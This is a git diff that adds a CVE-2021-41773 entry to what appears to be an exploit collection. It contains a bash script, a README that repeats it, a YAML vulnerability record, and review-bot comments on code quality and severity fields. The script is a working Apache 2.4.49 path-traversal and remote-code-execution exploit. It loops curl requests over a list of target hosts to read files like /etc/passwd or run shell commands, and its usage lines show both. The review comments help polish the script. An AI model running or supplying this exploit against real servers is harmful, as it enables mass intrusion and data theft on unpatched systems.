diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh
new file mode 100644
index 0000000000000000000000000000000000000000..2546e27094b9df45701b2f81ec6411592ffbaf56
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/CVE-2021-41773.sh
@@ -0,0 +1,22 @@
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+# Date: 10/05/2021
+# Exploit Author: Lucas Souza https://lsass.io
+# Vendor Homepage: https://apache.org/
+# Version: 2.4.49
+# Tested on: 2.4.49
+# CVE : CVE-2021-41773
+# Credits: Ash Daulton and the cPanel Security Team
+
+#!/bin/bash
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+
+# PoC.sh targets.txt /etc/passwd
+# PoC.sh targets.txt /bin/sh whoami
\ No newline at end of file
diff --git a/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..d4d6131327c1b67e68d3f021ce3855c7bf6b1270
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/CVE-2021-41773/README.md
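Review bot: The argument guard `if [[ $1 == '' ]]; [[ $2 == '' ]]; then` in CVE-2021-41773.sh is decided by `$2` alone, because an `if` over a `;`-separated list takes the status of the last command; an explicitly empty first argument passes the guard and the unquoted `cat $1` then reads stdin. Write it as `if [[ -z $1 || -z $2 ]]; then` and end the usage branch with `exit 1` so a usage error returns non-zero. The `#!/bin/bash` line sits on line 10 under the header comments, where it is only a comment; it has to be the first line of the file for `[[` to be guaranteed a bash interpreter. The usage text also misspells the first placeholder as `TAGET-LIST.TXT`, and the same script body is repeated verbatim in the README.md hunk.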
@@ -0,0 +1,27 @@
+# Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
+Date: 10/05/2021
+Exploit Author: Lucas Souza https://lsass.io
+Vendor Homepage: https://apache.org/
+Version: 2.4.49
+Tested on: 2.4.49
+CVE : CVE-2021-41773
+Credits: Ash Daulton and the cPanel Security Team
+```
+#!/bin/bash
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+```
+# Usage
+```
+PoC.sh targets.txt /etc/passwd
+PoC.sh targets.txt /bin/sh whoami
+```
+
diff --git a/cve/apache-HTTP Server/2021/yaml/.keep b/cve/apache-HTTP Server/2021/yaml/.keep
new file mode 100644
index 0000000000000000000000000000000000000000..e69de29bb2d1d6434b8b29ae775ad8c2e48c5391
diff --git a/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..420c8e1ab6814c866fecaad854fb073109fa4590
--- /dev/null
+++ b/cve/apache-HTTP Server/2021/yaml/CVE-2021-41773.yaml
@@ -0,0 +1,27 @@
+id: CVE-2021-41773
+source: https://www.exploit-db.com/exploits/50383
+info:
+ name: Apache HTTPd 是Apache基金会开源的一款HTTP服务器。
+ severity: critical
+ description:
+ 2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
+ scope-of-influence:
+ Apache HTTP Server = 2.4.49
+ reference:
+ - https://apache.org/
+ - https://www.exploit-db.com/exploits/50383
+ - https://blog.csdn.net/qq_48985780/article/details/120973100
+ - https://www.oracle.com/security-alerts/cpujan2022.html
+ - http://packetstormsecurity.com/files/164941/Apache-HTTP-Server-2.4.50-Remote-Code-Execution.html
+ - http://www.openwall.com/lists/oss-security/2021/10/08/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2021-41773
+ cwe-id: CWE-22
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - Apache HTTP Serve
+ - 路径穿越
+ - 任意文件读取
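Review bot: `severity: critical` disagrees with this record's own `cvss-score: 7.5` and its `C:H/I:N/A:N` vector, which sit in the CVSS v3.1 High band. Either set `severity: high`, or if the rating is meant to cover the code-execution case the description gives for servers with CGI or cgid enabled, note that next to the field so triage does not read the two values as a data error. `info.name` holds a one-sentence product description rather than the name of the vulnerability, and the first tag reads `Apache HTTP Serve` where `Apache HTTP Server` is meant. The record has no remediation field, and `scope-of-influence` lists only 2.4.49 while one reference is titled for 2.4.50, which suggests the next release may also have been affected; a line such as `fixed-in: <FIXED_VERSION from the vendor advisory>` would tell defenders what to upgrade to.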